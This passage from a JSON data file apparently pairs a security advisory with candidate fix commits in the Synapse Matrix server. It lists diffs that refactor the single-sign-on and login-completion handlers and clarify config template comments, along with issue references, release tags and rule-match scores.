UserAttributes:", + "-class SsoHandler(BaseHandler):", + "+class SsoHandler:", + " # The number of attempts to ask the mapping provider for when generating an MXID.", + "@@ -49,5 +50,7 @@ class SsoHandler(BaseHandler):", + " def __init__(self, hs: \"HomeServer\"):", + "- super().__init__(hs)", + "+ self._store = hs.get_datastore()", + "+ self._server_name = hs.hostname", + " self._registration_handler = hs.get_registration_handler()", + " self._error_template = hs.config.sso_error_template", + "+ self._auth_handler = hs.get_auth_handler()", + "@@ -97,3 +100,3 @@ class SsoHandler(BaseHandler):", + " # Check if we already have a mapping for this user.", + "- previously_registered_user_id = await self.store.get_user_by_external_id(", + "+ previously_registered_user_id = await self._store.get_user_by_external_id(", + " auth_provider_id, remote_user_id,", + "@@ -183,3 +186,3 @@ class SsoHandler(BaseHandler):", + " # Future logins should also match this user ID.", + "- await self.store.record_user_external_id(", + "+ await self._store.record_user_external_id(", + " auth_provider_id, remote_user_id, previously_registered_user_id", + "@@ -216,4 +219,4 @@ class SsoHandler(BaseHandler):", + " # Check if this mxid already exists", + "- user_id = UserID(attributes.localpart, self.server_name).to_string()", + "- if not await self.store.get_users_by_id_case_insensitive(user_id):", + "+ user_id = UserID(attributes.localpart, self._server_name).to_string()", + "+ if not await self._store.get_users_by_id_case_insensitive(user_id):", + " # This mxid is free", + "@@ -240,3 +243,3 @@ class SsoHandler(BaseHandler):", + "- await self.store.record_user_external_id(", + "+ await self._store.record_user_external_id(", + " auth_provider_id, remote_user_id, registered_user_id", + "@@ -244 +247,41 @@ class SsoHandler(BaseHandler):", + " return registered_user_id", + "+", + "+ async def complete_sso_ui_auth_request(", + "+ self,", + "+ auth_provider_id: str,", + "+ remote_user_id: str,", + "+ ui_auth_session_id: str,", + "+ request: Request,", + "+ ) -> None:", + "+ \"\"\"", + "+ Given an SSO ID, retrieve the user ID for it and complete UIA.", + "+", + "+ Note that this requires that the user is mapped in the \"user_external_ids\"", + "+ table. This will be the case if they have ever logged in via SAML or OIDC in", + "+ recentish synapse versions, but may not be for older users.", + "+", + "+ Args:", + "+ auth_provider_id: A unique identifier for this SSO provider, e.g.", + "+ \"oidc\" or \"saml\".", + "+ remote_user_id: The unique identifier from the SSO provider.", + "+ ui_auth_session_id: The ID of the user-interactive auth session.", + "+ request: The request to complete.", + "+ \"\"\"", + "+", + "+ user_id = await self.get_sso_user_by_remote_user_id(", + "+ auth_provider_id, remote_user_id,", + "+ )", + "+", + "+ if not user_id:", + "+ logger.warning(", + "+ \"Remote user %s/%s has not previously logged in here: UIA will fail\",", + "+ auth_provider_id,", + "+ remote_user_id,", + "+ )", + "+ # Let the UIA flow handle this the same as if they presented creds for a", + "+ # different user.", + "+ user_id = \"\"", + "+", + "+ await self._auth_handler.complete_sso_ui_auth(", + "+ user_id, ui_auth_session_id, request", + "+ )" + ], + "changed_files": [ + "changelog.d/8881.misc", + "mypy.ini", + "synapse/handlers/_base.py", + "synapse/handlers/auth.py", + "synapse/handlers/oidc_handler.py", + "synapse/handlers/saml_handler.py", + "synapse/handlers/sso.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8881": "Use the abstract registration code for CAS #8856" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8881, 8881", + "relevance": 32 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8881", + "relevance": 2 + } + ] + }, + { + "commit_id": "025fa06fc743bda7c4769b19991c40a1fb5d12ba", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607436188, + "hunks": 5, + "message": "Clarify config template comments (#8891)", + "diff": [ + "diff --git a/changelog.d/8891.doc b/changelog.d/8891.doc", + "new file mode 100644", + "index 000000000..c3947fe7c", + "--- /dev/null", + "+++ b/changelog.d/8891.doc", + "@@ -0,0 +1 @@", + "+Clarify comments around template directories in `sample_config.yaml`.", + "diff --git a/docs/sample_config.yaml b/docs/sample_config.yaml", + "index 8712c580c..68c8f4f0e 100644", + "--- a/docs/sample_config.yaml", + "+++ b/docs/sample_config.yaml", + "@@ -1881,7 +1881,4 @@ sso:", + " # Directory in which Synapse will try to find the template files below.", + "- # If not set, default templates from within the Synapse package will be used.", + "- #", + "- # DO NOT UNCOMMENT THIS SETTING unless you want to customise the templates.", + "- # If you *do* uncomment it, you will need to make sure that all the templates", + "- # below are in the directory.", + "+ # If not set, or the files named below are not found within the template", + "+ # directory, default templates from within the Synapse package will be used.", + " #", + "@@ -2115,5 +2112,4 @@ email:", + " # Directory in which Synapse will try to find the template files below.", + "- # If not set, default templates from within the Synapse package will be used.", + "- #", + "- # Do not uncomment this setting unless you want to customise the templates.", + "+ # If not set, or the files named below are not found within the template", + "+ # directory, default templates from within the Synapse package will be used.", + " #", + "diff --git a/synapse/config/emailconfig.py b/synapse/config/emailconfig.py", + "index cceffbfee..7c8b64d84 100644", + "--- a/synapse/config/emailconfig.py", + "+++ b/synapse/config/emailconfig.py", + "@@ -392,5 +392,4 @@ class EmailConfig(Config):", + " # Directory in which Synapse will try to find the template files below.", + "- # If not set, default templates from within the Synapse package will be used.", + "- #", + "- # Do not uncomment this setting unless you want to customise the templates.", + "+ # If not set, or the files named below are not found within the template", + "+ # directory, default templates from within the Synapse package will be used.", + " #", + "diff --git a/synapse/config/sso.py b/synapse/config/sso.py", + "index 442767616..93bbd4093 100644", + "--- a/synapse/config/sso.py", + "+++ b/synapse/config/sso.py", + "@@ -95,7 +95,4 @@ class SSOConfig(Config):", + " # Directory in which Synapse will try to find the template files below.", + "- # If not set, default templates from within the Synapse package will be used.", + "- #", + "- # DO NOT UNCOMMENT THIS SETTING unless you want to customise the templates.", + "- # If you *do* uncomment it, you will need to make sure that all the templates", + "- # below are in the directory.", + "+ # If not set, or the files named below are not found within the template", + "+ # directory, default templates from within the Synapse package will be used.", + " #" + ], + "changed_files": [ + "changelog.d/8891.doc", + "docs/sample_config.yaml", + "synapse/config/emailconfig.py", + "synapse/config/sso.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8891": "" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8891, 8891", + "relevance": 32 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8891", + "relevance": 2 + } + ] + }, + { + "commit_id": "e1b8e37f936b115e2164d272333c9b15342e6f88", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608148913, + "hunks": 42, + "message": "Push login completion down into SsoHandler (#8941) This is another part of my work towards fixing #8876. It moves some of the logic currently in the SAML and OIDC handlers - in particular the call to `AuthHandler.complete_sso_login` down into the `SsoHandler`.", + "diff": [ + "diff --git a/changelog.d/8941.feature b/changelog.d/8941.feature", + "new file mode 100644", + "index 000000000..d450ef499", + "--- /dev/null", + "+++ b/changelog.d/8941.feature", + "@@ -0,0 +1 @@", + "+Add support for allowing users to pick their own user ID during a single-sign-on login.", + "diff --git a/synapse/handlers/oidc_handler.py b/synapse/handlers/oidc_handler.py", + "index f626117f7..cbd11a138 100644", + "--- a/synapse/handlers/oidc_handler.py", + "+++ b/synapse/handlers/oidc_handler.py", + "@@ -117,4 +117,2 @@ class OidcHandler(BaseHandler):", + " self._http_client = hs.get_proxied_http_client()", + "- self._auth_handler = hs.get_auth_handler()", + "- self._registration_handler = hs.get_registration_handler()", + " self._server_name = hs.config.server_name # type: str", + "@@ -691,10 +689,6 @@ class OidcHandler(BaseHandler):", + "- # Pull out the user-agent and IP from the request.", + "- user_agent = request.get_user_agent(\"\")", + "- ip_address = self.hs.get_ip_from_request(request)", + "-", + " # Call the mapper to register/login the user", + " try:", + "- user_id = await self._map_userinfo_to_user(", + "- userinfo, token, user_agent, ip_address", + "+ await self._complete_oidc_login(", + "+ userinfo, token, request, client_redirect_url", + " )", + "@@ -703,17 +697,2 @@ class OidcHandler(BaseHandler):", + " self._sso_handler.render_error(request, \"mapping_error\", str(e))", + "- return", + "-", + "- # Mapping providers might not have get_extra_attributes: only call this", + "- # method if it exists.", + "- extra_attributes = None", + "- get_extra_attributes = getattr(", + "- self._user_mapping_provider, \"get_extra_attributes\", None", + "- )", + "- if get_extra_attributes:", + "- extra_attributes = await get_extra_attributes(userinfo, token)", + "-", + "- # and finally complete the login", + "- await self._auth_handler.complete_sso_login(", + "- user_id, request, client_redirect_url, extra_attributes", + "- )", + "@@ -840,6 +819,10 @@ class OidcHandler(BaseHandler):", + "- async def _map_userinfo_to_user(", + "- self, userinfo: UserInfo, token: Token, user_agent: str, ip_address: str", + "- ) -> str:", + "- \"\"\"Maps a UserInfo object to a mxid.", + "+ async def _complete_oidc_login(", + "+ self,", + "+ userinfo: UserInfo,", + "+ token: Token,", + "+ request: SynapseRequest,", + "+ client_redirect_url: str,", + "+ ) -> None:", + "+ \"\"\"Given a UserInfo response, complete the login flow", + "@@ -855,2 +838,4 @@ class OidcHandler(BaseHandler):", + "+ Otherwise, render a redirect back to the client_redirect_url with a loginToken.", + "+", + " Args:", + "@@ -858,4 +843,4 @@ class OidcHandler(BaseHandler):", + " token: a dict with the tokens obtained from the provider", + "- user_agent: The user agent of the client making the request.", + "- ip_address: The IP address of the client making the request.", + "+ request: The request to respond to", + "+ client_redirect_url: The redirect URL passed in by the client.", + "@@ -863,5 +848,2 @@ class OidcHandler(BaseHandler):", + " MappingException: if there was an error while mapping some properties", + "-", + "- Returns:", + "- The mxid of the user", + " \"\"\"", + "@@ -933,9 +915,19 @@ class OidcHandler(BaseHandler):", + "- return await self._sso_handler.get_mxid_from_sso(", + "+ # Mapping providers might not have get_extra_attributes: only call this", + "+ # method if it exists.", + "+ extra_attributes = None", + "+ get_extra_attributes = getattr(", + "+ self._user_mapping_provider, \"get_extra_attributes\", None", + "+ )", + "+ if get_extra_attributes:", + "+ extra_attributes = await get_extra_attributes(userinfo, token)", + "+", + "+ await self._sso_handler.complete_sso_login_request(", + " self._auth_provider_id,", + " remote_user_id,", + "- user_agent,", + "- ip_address,", + "+ request,", + "+ client_redirect_url,", + " oidc_response_to_user_attributes,", + " grandfather_existing_users,", + "+ extra_attributes,", + " )", + "diff --git a/synapse/handlers/saml_handler.py b/synapse/handlers/saml_handler.py", + "index 6001fe3e2..5fa7ab3f8 100644", + "--- a/synapse/handlers/saml_handler.py", + "+++ b/synapse/handlers/saml_handler.py", + "@@ -60,4 +60,2 @@ class SamlHandler(BaseHandler):", + " self._saml_idp_entityid = hs.config.saml2_idp_entityid", + "- self._auth_handler = hs.get_auth_handler()", + "- self._registration_handler = hs.get_registration_handler()", + "@@ -231,11 +229,5 @@ class SamlHandler(BaseHandler):", + "- # Pull out the user-agent and IP from the request.", + "- user_agent = request.get_user_agent(\"\")", + "- ip_address = self.hs.get_ip_from_request(request)", + "-", + " # Call the mapper to register/login the user", + " try:", + "- user_id = await self._map_saml_response_to_user(", + "- saml2_auth, relay_state, user_agent, ip_address", + "- )", + "+ await self._complete_saml_login(saml2_auth, request, relay_state)", + " except MappingException as e:", + "@@ -243,15 +235,14 @@ class SamlHandler(BaseHandler):", + " self._sso_handler.render_error(request, \"mapping_error\", str(e))", + "- return", + "- await self._auth_handler.complete_sso_login(user_id, request, relay_state)", + "-", + "- async def _map_saml_response_to_user(", + "+ async def _complete_saml_login(", + " self,", + " saml2_auth: saml2.response.AuthnResponse,", + "+ request: SynapseRequest,", + " client_redirect_url: str,", + "- user_agent: str,", + "- ip_address: str,", + "- ) -> str:", + "+ ) -> None:", + " \"\"\"", + "- Given a SAML response, retrieve the user ID for it and possibly register the user.", + "+ Given a SAML response, complete the login flow", + "+", + "+ Retrieves the remote user ID, registers the user if necessary, and serves", + "+ a redirect back to the client with a login-token.", + "@@ -259,8 +250,4 @@ class SamlHandler(BaseHandler):", + " saml2_auth: The parsed SAML2 response.", + "+ request: The request to respond to", + " client_redirect_url: The redirect URL passed in by the client.", + "- user_agent: The user agent of the client making the request.", + "- ip_address: The IP address of the client making the request.", + "-", + "- Returns:", + "- The user ID associated with this response.", + "@@ -320,7 +307,7 @@ class SamlHandler(BaseHandler):", + "- return await self._sso_handler.get_mxid_from_sso(", + "+ await self._sso_handler.complete_sso_login_request(", + " self._auth_provider_id,", + " remote_user_id,", + "- user_agent,", + "- ip_address,", + "+ request,", + "+ client_redirect_url,", + " saml_response_to_remapped_user_attributes,", + "diff --git a/synapse/handlers/sso.py b/synapse/handlers/sso.py", + "index 112a7d5b2..f054b66a5 100644", + "--- a/synapse/handlers/sso.py", + "+++ b/synapse/handlers/sso.py", + "@@ -23,3 +23,4 @@ from synapse.api.errors import RedirectException", + " from synapse.http.server import respond_with_html", + "-from synapse.types import UserID, contains_invalid_mxid_characters", + "+from synapse.http.site import SynapseRequest", + "+from synapse.types import JsonDict, UserID, contains_invalid_mxid_characters", + " from synapse.util.async_helpers import Linearizer", + "@@ -121,3 +122,3 @@ class SsoHandler:", + "- async def get_mxid_from_sso(", + "+ async def complete_sso_login_request(", + " self,", + "@@ -125,7 +126,8 @@ class SsoHandler:", + " remote_user_id: str,", + "- user_agent: str,", + "- ip_address: str,", + "+ request: SynapseRequest,", + "+ client_redirect_url: str,", + " sso_to_matrix_id_mapper: Callable[[int], Awaitable[UserAttributes]],", + " grandfather_existing_users: Optional[Callable[[], Awaitable[Optional[str]]]],", + "- ) -> str:", + "+ extra_login_attributes: Optional[JsonDict] = None,", + "+ ) -> None:", + " \"\"\"", + "@@ -148,2 +150,4 @@ class SsoHandler:", + "+ Finally, we generate a redirect to the supplied redirect uri, with a login token", + "+", + " Args:", + "@@ -151,5 +155,9 @@ class SsoHandler:", + " \"oidc\" or \"saml\".", + "+", + " remote_user_id: The unique identifier from the SSO provider.", + "- user_agent: The user agent of the client making the request.", + "- ip_address: The IP address of the client making the request.", + "+", + "+ request: The request to respond to", + "+", + "+ client_redirect_url: The redirect URL passed in by the client.", + "+", + " sso_to_matrix_id_mapper: A callable to generate the user attributes.", + "@@ -165,2 +173,3 @@ class SsoHandler:", + " to prompt the user for more information).", + "+", + " grandfather_existing_users: A callable which can return an previously", + "@@ -169,4 +178,4 @@ class SsoHandler:", + "- Returns:", + "- The user ID associated with the SSO response.", + "+ extra_login_attributes: An optional dictionary of extra", + "+ attributes to be provided to the client in the login response.", + "@@ -183,24 +192,29 @@ class SsoHandler:", + " # first of all, check if we already have a mapping for this user", + "- previously_registered_user_id = await self.get_sso_user_by_remote_user_id(", + "+ user_id = await self.get_sso_user_by_remote_user_id(", + " auth_provider_id, remote_user_id,", + " )", + "- if previously_registered_user_id:", + "- return previously_registered_user_id", + " # Check for grandfathering of users.", + "- if grandfather_existing_users:", + "- previously_registered_user_id = await grandfather_existing_users()", + "- if previously_registered_user_id:", + "+ if not user_id and grandfather_existing_users:", + "+ user_id = await grandfather_existing_users()", + "+ if user_id:", + " # Future logins should also match this user ID.", + " await self._store.record_user_external_id(", + "- auth_provider_id, remote_user_id, previously_registered_user_id", + "+ auth_provider_id, remote_user_id, user_id", + " )", + "- return previously_registered_user_id", + " # Otherwise, generate a new user.", + "- attributes = await self._call_attribute_mapper(sso_to_matrix_id_mapper)", + "- user_id = await self._register_mapped_user(", + "- attributes, auth_provider_id, remote_user_id, user_agent, ip_address,", + "- )", + "- return user_id", + "+ if not user_id:", + "+ attributes = await self._call_attribute_mapper(sso_to_matrix_id_mapper)", + "+ user_id = await self._register_mapped_user(", + "+ attributes,", + "+ auth_provider_id,", + "+ remote_user_id,", + "+ request.get_user_agent(\"\"),", + "+ request.getClientIP(),", + "+ )", + "+", + "+ await self._auth_handler.complete_sso_login(", + "+ user_id, request, client_redirect_url, extra_login_attributes", + "+ )", + "diff --git a/tests/handlers/test_saml.py b/tests/handlers/test_saml.py", + "index 69927cf6b..548038214 100644", + "--- a/tests/handlers/test_saml.py", + "+++ b/tests/handlers/test_saml.py", + "@@ -133,3 +133,3 @@ class SamlHandlerTestCase(HomeserverTestCase):", + " auth_handler.complete_sso_login.assert_called_once_with(", + "- \"@test_user:test\", request, \"redirect_uri\"", + "+ \"@test_user:test\", request, \"redirect_uri\", None", + " )", + "@@ -159,3 +159,3 @@ class SamlHandlerTestCase(HomeserverTestCase):", + " auth_handler.complete_sso_login.assert_called_once_with(", + "- \"@test_user:test\", request, \"\"", + "+ \"@test_user:test\", request, \"\", None", + " )", + "@@ -168,3 +168,3 @@ class SamlHandlerTestCase(HomeserverTestCase):", + " auth_handler.complete_sso_login.assert_called_once_with(", + "- \"@test_user:test\", request, \"\"", + "+ \"@test_user:test\", request, \"\", None", + " )", + "@@ -216,3 +216,3 @@ class SamlHandlerTestCase(HomeserverTestCase):", + " auth_handler.complete_sso_login.assert_called_once_with(", + "- \"@test_user1:test\", request, \"\"", + "+ \"@test_user1:test\", request, \"\", None", + " )" + ], + "changed_files": [ + "changelog.d/8941.feature", + "synapse/handlers/oidc_handler.py", + "synapse/handlers/saml_handler.py", + "synapse/handlers/sso.py", + "tests/handlers/test_saml.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8941": "Implement a username picker for synapse #8942", + "8876": "Support multiple SSO identity providers during login/UIA flow #8927 Push login completion down into SsoHandler #8941 Implement a username picker for synapse #8942" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + 